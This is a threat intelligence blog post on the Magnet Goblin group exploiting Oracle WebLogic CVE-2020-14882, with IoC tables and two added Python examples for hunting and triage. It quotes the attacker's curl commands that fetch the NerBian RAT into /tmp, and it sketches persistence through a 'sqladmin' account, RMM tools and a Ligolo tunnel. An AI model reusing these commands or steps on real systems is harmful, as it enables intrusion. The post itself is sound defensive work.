Security operations · 8 MIN READ · AARON WALTON · NOV 12, 2024 · TAGS: Alert / Get technical / Threat hunting / vulnerability prioritization
TL;DR
- A threat actor known for targeting vulnerabilities is currently targeting CVE-2020-14882 in Oracle WebLogic
- This threat actor is financially motivated and is notorious for selling network access to ransomware gangs
- If you use Oracle WebLogic, we recommend patching and keeping it up to date
In September of 2024, we observed multiple instances of successful exploitation of Oracle WebLogic. These events occurred against multiple customers and appear to have leveraged the same CVE-2020-14882 vulnerability each time.
Based on our observations, each incident was the result of a single criminal group targeting servers. Checkpoint tracks this threat actor as Magnet Goblin. We are sharing this report to provide public information for continued awareness and tracking of this threat actor, and we want to ensure organizations (you!) can continue to secure your environment.
Oracle WebLogic vulnerability meets Magnet Goblin
In 2020, a critical vulnerability was identified in Oracle WebLogic (CVE-2020-14882). WebLogic is an application server for hosting web apps—primarily eCommerce sites. Researchers found that the service had a critical vulnerability that could be exploited with as little as a single web request.
That single web request performs a path traversal that lets the attacker execute arbitrary code on the server. Severe vulnerabilities like this are frequently of interest to attackers because they provide an easy means of accessing a network.
Magnet Goblin is one of those interested crime groups. This group is known as an initial access broker (IAB). An IAB gains access to networks and then sells that access to other bad actors. Magnet Goblin has been known to work with ransomware gangs, like the Cactus Ransomware gang.
A critical vulnerability like CVE-2020-14882 is a valuable vulnerability to an IAB like Magnet Goblin. If a bad actor understands how to exploit a vulnerability like this, then they can use it to compromise multiple networks, and make a pretty penny. And from our observation, this appears to be the case with this CVE.
Based on public reporting, Magnet Goblin has regularly targeted several critical vulnerabilities in the past few years. They’ve also been observed exploiting similar vulnerabilities in Qlik Sense (CVE-2023-41267, CVE-2023-41265, and CVE-2023-48365), Ivanti Connect Secure VPN (CVE-2023-46805 and CVE-2024-21887), and Magento (CVE-2022-24086).
What we’ve seen
As mentioned previously, CVE-2020-14882 allows an actor to execute arbitrary code. In Magnet Goblin’s attacks, they execute the command “/bin/sh curl -k -o /tmp/nix hxxps://file[.]io/slzUjFaS9d94”. This command uses `curl` to retrieve a file from file[.]io and write it to the `tmp` directory as “nix”. In instances where the threat actor failed to pull the file from file[.]io, they used a SimpleHTTP server on their own systems, which looks like this: “/bin/sh -c curl -o /tmp/nix http://91.92.251[.]175:8383/nixrat”.
The vulnerability lets the attacker execute arbitrary commands, but what they can do through that channel alone is limited. So, the attacker uses these commands to pull their preferred tools onto the host and expand their access. Magnet Goblin uses the CVE to pull down a remote access tool (RAT) known as the NerBian RAT. Based on public reporting, this has been their preferred tool for several years.
For an IAB like Magnet Goblin, the most important thing is to maintain network access. After deploying the NerBian RAT, they create a user account for themselves named `sqladmin`. This account is then used to connect to other machines and deploy more RATs—including remote monitoring and management (RMM) tools—within the environment to fly under the radar. The bad actor often relies on commercial or open-source tools to avoid detection. In this instance, they deployed:
- Panda Security Remote Control
- SimpleHelp
- N-Able Take Control
- Level IO Remote Access Client
IABs deploy multiple RATs and RMM tools to ensure they retain network access no matter what. If one is blocked or removed, they can rely on the others. They often use commercial or open source tools, with the expectation that they’ll have lower detection rates.
Magnet Goblin will also deploy a Ligolo tunnel. The Ligolo tunnel is used to hide the attacker’s access by routing it through a VPN. Thankfully, in the incidents we observed, the attacker didn’t get the chance to perform activity beyond deploying the RATs because their activity was identified and stopped by our SOC.
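The activity above leaves a recognizable trail in process-creation telemetry: a shell spawned by the WebLogic Java process that runs `curl` to write into `/tmp`, execution of that dropped file, and creation of the `sqladmin` account. The following hunt is an added example, not code from Expel or from the original post; the event format and the sample events are constructed (the host names, PIDs and the 203.0.113.10 address are placeholders), and any EDR export would need to be mapped onto the `parent_cmdline`/`cmdline` fields it assumes.

```python
import json
import re

# Constructed process-creation events in a JSON-lines layout loosely modelled
# on EDR telemetry. These are NOT events from the incidents described above;
# 203.0.113.10 is a documentation address and the paths are placeholders.
SAMPLE_EVENTS_JSONL = """
{"host": "wls-prod-01", "pid": 4102, "ppid": 1890, "user": "oracle", "parent_cmdline": "/usr/bin/java -Dweblogic.Name=AdminServer weblogic.Server", "cmdline": "/bin/sh -c curl -o /tmp/nix http://203.0.113.10:8383/nixrat"}
{"host": "wls-prod-01", "pid": 4110, "ppid": 1890, "user": "oracle", "parent_cmdline": "/usr/bin/java -Dweblogic.Name=AdminServer weblogic.Server", "cmdline": "/bin/sh -c /tmp/nix"}
{"host": "wls-prod-01", "pid": 4120, "ppid": 4110, "user": "root", "parent_cmdline": "/tmp/nix", "cmdline": "useradd -m sqladmin"}
{"host": "build-02", "pid": 777, "ppid": 700, "user": "jenkins", "parent_cmdline": "/bin/bash", "cmdline": "curl -o /tmp/artifact.tgz https://repo.example.internal/build.tgz"}
"""

# Parent is the WebLogic server JVM (matches the standard launch arguments).
WEBLOGIC_PARENT = re.compile(r"weblogic\.Server|weblogic\.Name=")
# A shell that downloads with curl/wget straight into /tmp, with or without -c.
SHELL_DOWNLOAD = re.compile(r"^/bin/(?:ba)?sh\b.*\b(?:curl|wget)\b.*(?:-o|-O)\s+/tmp/")
# The dropped file being launched from /tmp.
EXEC_FROM_TMP = re.compile(r"^/bin/(?:ba)?sh\s+-c\s+/tmp/\S+|^/tmp/\S+")
# Creation of the actor's persistence account on Linux or Windows.
ACCOUNT_CREATE = re.compile(
    r"\b(?:useradd|adduser)\b.*\bsqladmin\b|\bnet\s+user\s+sqladmin\b.*/add", re.I)


def load_events(jsonl):
    """Parse JSON-lines text into a list of event dicts, skipping blank lines."""
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]


def classify(event):
    """Return the list of rule names the event triggers (empty if benign)."""
    findings = []
    parent = event.get("parent_cmdline", "")
    cmd = event.get("cmdline", "")
    # Download/execute rules only fire when the parent is the WebLogic JVM;
    # a developer running curl from bash (last sample event) stays quiet.
    if WEBLOGIC_PARENT.search(parent):
        if SHELL_DOWNLOAD.search(cmd):
            findings.append("weblogic_shell_download_to_tmp")
        if EXEC_FROM_TMP.search(cmd):
            findings.append("weblogic_exec_from_tmp")
    # Account creation is suspicious regardless of which process did it.
    if ACCOUNT_CREATE.search(cmd):
        findings.append("sqladmin_account_created")
    return findings


def hunt(events):
    """Run every rule over every event and return one hit per (event, rule)."""
    hits = []
    for event in events:
        for rule in classify(event):
            hits.append({"host": event["host"], "pid": event["pid"],
                         "rule": rule, "cmdline": event["cmdline"]})
    return hits


if __name__ == "__main__":
    for hit in hunt(load_events(SAMPLE_EVENTS_JSONL)):
        print(f"{hit['host']} pid={hit['pid']} {hit['rule']}: {hit['cmdline']}")
```

The parent-process condition is what keeps the download rule useful: `curl -o /tmp/...` on its own is everyday behaviour on build and admin hosts, but a WebLogic JVM should never be the parent of a shell that fetches and runs a file from `/tmp`. The `sqladmin` rule is deliberately unconditional, since the account was created after the RAT was already running under a different parent.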
Ties to Magnet Goblin
Based on the tactics we identified in our customers’ environments, it appeared that Magnet Goblin was the bad actor present.
First, the actor appeared to consistently use Limenet infrastructure. In December 2023, eSentire reported a threat actor using the same IP address (91.92.251.175) in a similar incident to host a PowerShell script. According to their reporting, the threat actor also used several RATs for persistence, including Level IO Remote Access Client. In that incident, the actor gained access via a Qlik Sense vulnerability (CVE-2023-41266, CVE-2023-41265, or CVE-2023-48365).
The infrastructure the attacker used, Limenet, is a virtual private server provider that promises “complete anonymity,” according to their website. In practical terms, Limenet maintains minimal logs and information about their customers, so the service is ripe for abuse from IAB groups (like Magnet Goblin).
In both the incident reported by eSentire and the incidents we observed, the threat actor leveraged `requestcatcher.com`. This service is an out-of-band application security testing (OAST) tool that lets users monitor their own web traffic—which the bad actor likely used to confirm successful web exploitation. Over the years, the attacker seems to consistently employ an OAST tool—and often the same tool—to validate their attacks.
Additionally, the NerBian RAT has historically been associated with Magnet Goblin, and may even be a custom malware of theirs. Their use of this RAT has been consistently reported over the last few years. DarkTrace reported that an attacker downloaded it from Limenet infrastructure and, in the incident we observed, the malware also had a hard-coded command-and-control server on Limenet infrastructure.
All of this evidence made us confident that we were dealing with Magnet Goblin.
Example indicators of compromise (IoCs)
The following table contains file hashes for the files that we observed. Like many RMM tools or RATs, these files may only be malicious if the tools aren’t expected in your environment.
File name | SHA256 hash | Context |
---|---|---|
nix | 19e0aab36e15ddb57e684748ac73dbced7d08e35c5950fe53a3b4011cba1f7ac | NerBian RAT |
28wy.exe | 0798af37e50918997debfaf77bd8d657532bb0a6153dc812d6fcee7c999a3c17 | Unknown binary deployed by attacker |
28wy.exe | f9ea148faf6ffff9044d1b3b8c2f98882134890b0e4e17eb0518b9a1b013238a | Unknown binary deployed by attacker |
agent.exe | 62b96e1b703f03e134085caa15942765b485417c6f99a2046d1ed7cfacc4aac4 | Ligolo Tunnel |
ehorus_agent.exe | 7f4cc58b690d658d6528485637a9170e5b791630ebfd4a644119f02004f58a30 | Panda Remote Control Agent |
ehorus_cmd.exe | a5b1c55fad336a74aa41c5b7075075d28c26df4fc0c43732f2e53123cc7e56ef | Panda Remote Control Agent |
ehorus_display.exe | 196a87a187e7969cc2ccdc713e7d030ab77feafc9b53619f1a4bfb4fda002f5a | Panda Remote Control Agent |
ehorus_launcher.exe | 2e64bf8ca66e4363240e10dd8c85eabbf104d08aba60b307435ff5760d425a92 | Panda Remote Control Agent |
ehorus_uit.exe | 247085a59535d4f68d6af35bc54a017e4f479f17ea96f20384ea0aeeb7ef3040 | Panda Remote Control Agent |
winpty-agent.exe | 1438bb19667d54e7df9cd2edae0b879ab936e2a9533ef82069b019dfd3b8b661 | Panda Remote Control Agent |
winpty-agent.exe | 1a896301784758c59722d1e61a0dd20a8269c460ed739277aeb4c98ca11b28a4 | Panda Remote Control Agent |
level.exe | 54d737c9cd2c064ba462f6d406cdb0edecc6fd2ef72cb719c25100eda81f4044 | Level Remote Access Client |
osqueryi.exe | 824808240cf683202a6c0592c9eb8eac9deb85e8f4c5b22d9d43472dfd8bfa78 | OSQuery Daemon Shell—used by Level Remote Access client |
FileCacheServiceAgent.exe | ff7cc1a8e79e193a9d9d083afea4b06a98f48647b9d0e750d7dae4c657a77e93 | N-Able FileCacheServiceAgent |
fmplugin.exe | 14b13a47e353e3c485bd57a62b85ed7e9affa3f5f1e7529efdc72e092939d894 | N-Able fm plugin |
assetscan.exe | a9bce9eeb0b048f8a8b17b493cc8c6cdf581faeb42af46f0179119a34c0bdbac | N-Able assetscan.exe |
MSP_Connect.exe | 21fdf6e9ed0fdc0c4ec70779c0be1007185bd5ec2c48a9cea3a73970ae29fe6d | N-Able Take Control Agent |
NetworkManagementInstall.exe | 7e47226289726b16c27782bf35a07a3d020afe314957f1648f98a51091f88acd | N-Able Advanced Monitoring Agent Network Management |
PME.Agent.exe | 207fe3368b801c0ca77864d03b29662b391d85b8655654a3ff91fea5830ff0b | N-Able PME.Agent |
PMESetup.exe | d772e491c1f9ceded3042b3c5c7e1a2f9463746dc8adaaf382315239d744960c | N-Able Patch Management Service Controller |
winagent.exe | 7b1fd98dd50b1474a8cbafd3ba885d21841bd9293fdcd3443c5fb299c7a85c38 | N-Able Advanced Monitoring Agent |
RequestHandlerAgentSetup.exe | 32faa94eaf95670a8bf88361712c12392efe93e05d6bf611e86ce07ad1d14ee7 | N-Able Request Handler Agent |
Remote Access.exe | 6f96b31495c07f54e174dcf990dd489e1d5f1863ffd52c026300d4115a9cad37 | SimpleHelp JWrapper Remote Access Client |
Remote Access.exe | 78137fe94fd5450b2f2614af2b646f5d64da89b124fbbe8cb842d103ed14d729 | SimpleHelp Remote Access Client |
RemoteAccessLauncher.exe | 6f96b31495c07f54e174dcf990dd489e1d5f1863ffd52c026300d4115a9cad37 | SimpleHelp Remote Access Client |
RemoteAccessWinLauncher.exe | 78137fe94fd5450b2f2614af2b646f5d64da89b124fbbe8cb842d103ed14d729 | SimpleHelp Remote Access Client |
elev_win.exe | 438ba43227682d7f46d9da5a739331ceb793ecf2038b20d5f0c9ff15eae8940b | SimpleHelp JWrapper Remote Access Client |
remoteaccess-jar-with-depedencies.jar | bfb6dae17c901643a1888088e3971f3e85b2bb19a41d9978bcfa42910545be5a | Simple Help Remote Access JAR File |
shcad.exe | 733aefd24574f9b25bd8cdc20246c6c5a37a95449add69f40583f6939de56ea9 | SimpleHelp Binary |
StopSimpleGatewayService.exe | 78137fe94fd5450b2f2614af2b646f5d64da89b124fbbe8cb842d103ed14d729 | SimpleHelp Remote Access Client |
windowslauncher.exe | 6f96b31495c07f54e174dcf990dd489e1d5f1863ffd52c026300d4115a9cad37 | SimpleHelp Remote Access Client |
winpty-agent64.exe | 586a2d7d3092b364db3cbb5a7dbc83cf7ef233338c4172c1bae6587f8b374cab | SimpleHelp PTY Agent |
cadasuser.exe | 57fb030e4ed08aef7eb505ab4c071cba98c4dc92166a3840e2a121dc75abedfe | SimpleHelp Utility |
The following table contains the IP addresses and domains identified as part of the malicious activity in the incidents we investigated.
IP/Domain | Context |
---|---|
91.92.251[.]175 | Web server hosting attacker payloads. |
91.92.249[.]195 | IP address hard-coded into NerBian RAT binary. |
27-96-43-135[.]ipq[.]jp | VPN domain hosted at IPQ.JP leveraged by attacker to download payload. |
bashupload[.]com | A short-lived file hosting service intended for single-use commands. Was weaponized in attack to host NerBian RAT. |
file[.]io | A file hosting platform used by the attacker. |
leprechaun[.]ehorus[.]com | Management panel for Panda Remote Control. |
mail[.]157-230-41-8[.]cprapid[.]com | cPanel instance hosted in DigitalOcean, believed to be attacker-controlled. |
157.230.41[.]8 | IP address for the cPanel instance hosted in DigitalOcean. |
pruebas[.]pintacuario[.]mx | Management domain used by SimpleHelp. |
requestcatcher[.]com | Out-of-band application security testing domain used to confirm successful exploitation. |
Vulnerability prioritization is key for effective remediation
New vulnerabilities are found every day, but not all of them are interesting to attackers. It’s important to prioritize remediating exploited vulnerabilities over those that just exist. Expel provides this information as part of our vulnerability prioritization offering. And we utilize information from a customer’s network scans to understand what vulnerabilities are in an environment, so we can then recommend patching prioritization. Our prioritization recommendations are based on public and private information on what vulnerabilities attackers are targeting. This means that teams that we support can ensure they are patching or mitigating vulnerabilities that attackers are targeting quickly, without needing to do arduous research themselves.
Magnet Goblin’s track record helps create a concrete example of an attacker that prioritizes learning about and using critical vulnerabilities. Warning about these vulnerabilities isn’t just theoretical. There are real attackers who make a living out of targeting these vulnerabilities. It’s important to have an effective plan for mitigating risk around vulnerabilities when they’re identified because they can quickly become problems for your business.
It’s important to monitor for and detect unexpected RMM tools. The website https://lolrmm.io/ maintains a robust list of RMM tools that are often abused by attackers. A list like this is useful for building detections or performing hunts for unauthorized RMM tools.
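The IoC table above and the advice on unexpected RMM tools fit together in one triage step: a hash match on the NerBian RAT or Ligolo is malicious anywhere, while a hash or filename match on an RMM agent is only a finding when that tool is not approved for the environment. The script below is an added example, not Expel’s code or tooling; the SHA256 values are copied from the table above, the filename list is a small constructed subset in the style of a lolrmm.io-type catalogue, and the host inventory and the `APPROVED_RMM` set are constructed placeholders.

```python
from dataclasses import dataclass

# SHA256 values copied from the IoC table above, grouped by what they are.
MALWARE_HASHES = {
    "19e0aab36e15ddb57e684748ac73dbced7d08e35c5950fe53a3b4011cba1f7ac": "NerBian RAT",
    "62b96e1b703f03e134085caa15942765b485417c6f99a2046d1ed7cfacc4aac4": "Ligolo tunnel",
}
RMM_HASHES = {
    "54d737c9cd2c064ba462f6d406cdb0edecc6fd2ef72cb719c25100eda81f4044": "Level",
    "21fdf6e9ed0fdc0c4ec70779c0be1007185bd5ec2c48a9cea3a73970ae29fe6d": "N-Able Take Control",
    "7f4cc58b690d658d6528485637a9170e5b791630ebfd4a644119f02004f58a30": "Panda Remote Control",
}
# Constructed subset of RMM agent filenames (lower-cased), in the style of a
# lolrmm.io-type list. Catches agents whose build differs from the hashes above.
RMM_FILENAMES = {
    "remote access.exe": "SimpleHelp",
    "remoteaccesslauncher.exe": "SimpleHelp",
    "level.exe": "Level",
    "ehorus_agent.exe": "Panda Remote Control",
    "msp_connect.exe": "N-Able Take Control",
}


@dataclass
class Finding:
    host: str
    path: str
    verdict: str   # "malware" or "unapproved_rmm"
    label: str     # tool or malware family name


def triage(inventory, approved_rmm):
    """inventory: iterable of (host, path, sha256). approved_rmm: set of tool names."""
    findings = []
    for host, path, sha256 in inventory:
        sha = sha256.lower()
        name = path.replace("\\", "/").rsplit("/", 1)[-1].lower()
        # Known malware is a finding wherever it turns up.
        if sha in MALWARE_HASHES:
            findings.append(Finding(host, path, "malware", MALWARE_HASHES[sha]))
            continue
        # RMM agents: match on hash first, then fall back to filename.
        tool = RMM_HASHES.get(sha) or RMM_FILENAMES.get(name)
        if tool and tool not in approved_rmm:
            findings.append(Finding(host, path, "unapproved_rmm", tool))
    return findings


# Constructed host inventory (placeholder hosts; the all-zero hash is a
# stand-in for an unrecognised build of the SimpleHelp client).
SAMPLE_INVENTORY = [
    ("wls-prod-01", "/tmp/nix", "19e0aab36e15ddb57e684748ac73dbced7d08e35c5950fe53a3b4011cba1f7ac"),
    ("fileserver-02", "C:\\Users\\Public\\level.exe", "54d737c9cd2c064ba462f6d406cdb0edecc6fd2ef72cb719c25100eda81f4044"),
    ("helpdesk-07", "C:\\Program Files\\N-able\\MSP_Connect.exe", "21fdf6e9ed0fdc0c4ec70779c0be1007185bd5ec2c48a9cea3a73970ae29fe6d"),
    ("fileserver-02", "C:\\ProgramData\\Remote Access.exe", "0" * 64),
    ("workstation-11", "C:\\Windows\\System32\\notepad.exe", "f" * 64),
]
# Constructed: the one RMM product this fictional organisation sanctions.
APPROVED_RMM = {"N-Able Take Control"}


if __name__ == "__main__":
    for f in triage(SAMPLE_INVENTORY, APPROVED_RMM):
        print(f"{f.verdict:15} {f.label:22} {f.host}: {f.path}")
```

Feeding the real list from lolrmm.io into `RMM_FILENAMES` (or, better, into a hash set built from vendor binaries) turns this into a hunt across a whole fleet; the approved set is what separates "we installed that" from "an IAB installed that" and has to come from the asset owner, not the hash feed.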
If you have more questions on preventing or remediating similar CVEs, or want to learn more about our vulnerability prioritization or threat hunting offerings, you can reach out to us here.